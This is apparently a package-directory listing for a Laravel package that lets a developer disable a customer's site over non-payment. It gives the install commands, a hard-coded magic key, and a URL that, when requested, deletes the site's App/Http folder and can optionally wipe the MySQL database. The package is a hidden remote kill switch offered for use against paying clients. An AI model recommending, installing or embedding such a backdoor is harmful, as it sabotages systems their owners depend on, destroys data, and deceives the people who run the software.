webpajooh/laravel-repoman is a Laravel package for set a payment deadline for the customer.
It currently has 27 GitHub stars and 80 downloads on Packagist (latest version v1.1.0).
Install it with composer require webpajooh/laravel-repoman.
Discover more Laravel packages by webpajooh
or browse all Laravel packages to compare alternatives.
Last updated
Suppose the customer has not paid and you want to deactivate the site if the deadline is reached and he does not pay!
composer require webpajooh/laravel-repomanphp artisan vendor:publishThere is a magic_key option in the configuration file that is commented by default:
'magic_key' => 'Lbs96hv7Fzn28QLSXaIKtAXwlHSDU'
You can change the value, and use it when you want:
example.com/?magic_key=Lbs96hv7Fzn28QLSXaIKtAXwlHSDU
If we send a request to this link, we will lose the App/Http folder! What about the database? Uncomment empty_database, and the package will fresh the database after creating a backup into storage/app directory. Consider that we only support MySQL at the moment.